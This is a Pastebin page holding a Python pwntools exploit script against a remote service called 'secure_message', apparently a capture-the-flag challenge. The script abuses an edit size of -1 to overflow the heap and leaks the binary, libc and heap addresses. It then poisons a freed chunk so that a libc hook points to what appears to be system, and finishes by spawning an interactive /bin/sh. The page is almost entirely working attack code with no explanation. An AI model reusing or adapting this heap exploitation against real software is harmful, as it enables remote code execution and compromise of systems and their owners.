API tools faq
paste
Guest User

Untitled

a guest
Jul 15th, 2018
123
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.86 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. from pwn import *
  3.  
  4. context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
  5. # context(terminal=['tmux', 'new-window']) # open new window
  6.  
  7. # libc = ELF('./libc-2.27.so')
  8. elf = ELF('./secure_message')
  9. context(os='linux', arch=elf.arch)
  10.  
  11. RHOST = "178.128.87.12"
  12. RPORT = 31337
  13. LHOST = "127.0.0.1"
  14. LPORT = 31337
  15.  
  16. def section_addr(name, elf=elf):
  17. return elf.get_section_by_name(name).header['sh_addr']
  18.  
  19. def dbg(ss):
  20. log.info("%s: 0x%x" % (ss, eval(ss)))
  21.  
  22. conn = None
  23. opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
  24. if opt in 'rl':
  25. conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
  26. elif opt == 'd':
  27. gdbscript = """
  28.  
  29. continue
  30. """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
  31. conn = gdb.debug(['./secure_message'], gdbscript=gdbscript)
  32. else:
  33. conn = process(['./secure_message'])
  34. # conn = process(['./secure_message'], env={'LD_PRELOAD': './libc-2.27.so'})
  35. if opt == 'a': gdb.attach(conn)
  36.  
  37. def register(name, password, desc):
  38. conn.sendlineafter('Choice: ', '1')
  39. conn.sendafter('Username:', name)
  40. conn.sendafter('Password:', password)
  41. conn.sendafter('Describe your self', desc)
  42. def login(name, password):
  43. conn.sendlineafter('Choice: ', '2')
  44. conn.sendafter('Username:', name)
  45. conn.sendafter('Password:', password)
  46. conn.recvuntil('Hello:')
  47.  
  48. def quit():
  49. conn.sendlineafter('Choice: ', '3')
  50.  
  51. def add(name, size, content):
  52. conn.sendlineafter('Choice: ', '1')
  53. conn.sendlineafter('Name: ', name)
  54. conn.sendlineafter('Size:', str(size))
  55. time.sleep(0.1)
  56. conn.send(content)
  57.  
  58. def edit(idx, size, content):
  59. conn.sendlineafter('Choice: ', '3')
  60. conn.sendlineafter('edit?', str(idx))
  61. conn.sendlineafter('Size:', str(size))
  62. time.sleep(0.1)
  63. conn.send(content)
  64.  
  65. def remove(idx):
  66. conn.sendlineafter('Choice: ', '2')
  67. conn.sendlineafter('?', str(idx))
  68.  
  69. # exploit
  70. log.info('Pwning')
  71. register('hoge\n', 'fuga\n','a'*0x80)
  72. register('b'*0x20,'b'*0x20,'b'*0x80)
  73. register('c'*0x20,'c'*0x20,'c'*0x80)
  74. register('d'*0x20,'d'*0x20,'d'*0x80)
  75. login('hoge\n', 'fuga\n')
  76.  
  77. add('x'*0x18, 0xfd0, 'z'*0xfd0)
  78. conn.send(p64(0xc9f68e5b26a07627))
  79. conn.send(p64(0xc9f68e5b26a07627))
  80. conn.send(p64(0xc9f68e5b26a07627))
  81. add('y'*0x18, 0xfd0, 'w'*0xfd0)
  82. conn.send(p64(0xc9f68e5b26a07627+0x1000))
  83. conn.send(p64(0xc9f68e5b26a07627+0x1000))
  84. conn.send(p64(0xc9f68e5b26a07627+0x1000))
  85. edit(0, -1, 'a'*0x1f00+'\n')
  86.  
  87. add('', 0xff, '\n')
  88. conn.send(p64(0xc9f68e5b26a07627+0x3000))
  89. conn.send(p64(0xc9f68e5b26a07627+0x3000))
  90. conn.send(p64(0)*4)
  91. #conn.send(p64(0xc9f68e5b26a07627+0x2000))
  92.  
  93. conn.sendlineafter('Choice: ', '4')
  94. conn.recvuntil('1 - [yyyyyyyyyyyyyyyyyyyyyyyy')
  95. bin_base = u64(conn.recv(6)+'\x00\x00') - 0x211d
  96. dbg('bin_base')
  97. conn.recvuntil('\n')
  98. libc_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x3ec2b0
  99. dbg('libc_base')
  100. conn.recv(14)
  101. heap_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x250
  102. dbg('heap_base')
  103.  
  104. add('aaaaaa', 0x1000, 'b'*0x1000)
  105. conn.send(p64(0xdeadbeef000))
  106. conn.send(p64(0xdeadbeef000))
  107. conn.send(p64(0)*4)
  108. add('target', 0x100, 'c'*0x1000)
  109. conn.send(p64(0xdeadbef0000))
  110. conn.send(p64(0xdeadbef0000))
  111. conn.send(p64(0)*4)
  112. edit(2, 8192, 'hoge\n')
  113.  
  114. payload = 'd'*0xfd0 + p32(0x100) + p32(1) + p64(0xe5b26a08030 + 0x10)
  115. add('aaaaaa', 0x1100, payload+'\n')
  116. conn.send(p64(0x00000deadbef0000-0x1000))
  117. conn.send(p64(0x00000deadbef0000-0x1000))
  118. conn.send(p64(0)*4)
  119.  
  120. payload = p64(0) + p64(0x31)
  121. payload += p64(0) * 5
  122. payload += p64(0x31)
  123. edit(0, 0x100, payload+'\n')
  124.  
  125. remove(2)
  126.  
  127. payload = p64(0) + p64(0x31)
  128. payload += p64(libc_base + 0x3ed8e8)+p64(0) * 4
  129. payload += p64(0x31)
  130. edit(0, 0x100, payload+'\n')
  131.  
  132. add('a', 0xf00, 'hoge\n')
  133. conn.send(p64(0xbeefdead000))
  134. conn.send(p64(0xbeefdead000))
  135. conn.send(p64(0)*4)
  136.  
  137. add('a', 0xf00, '/bin/sh\x00\n')
  138. conn.send(p64(0xbeefdead000))
  139. conn.send(p64(0xbeefdead000))
  140. conn.send(p64(libc_base+0x4f440))
  141.  
  142. conn.interactive()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!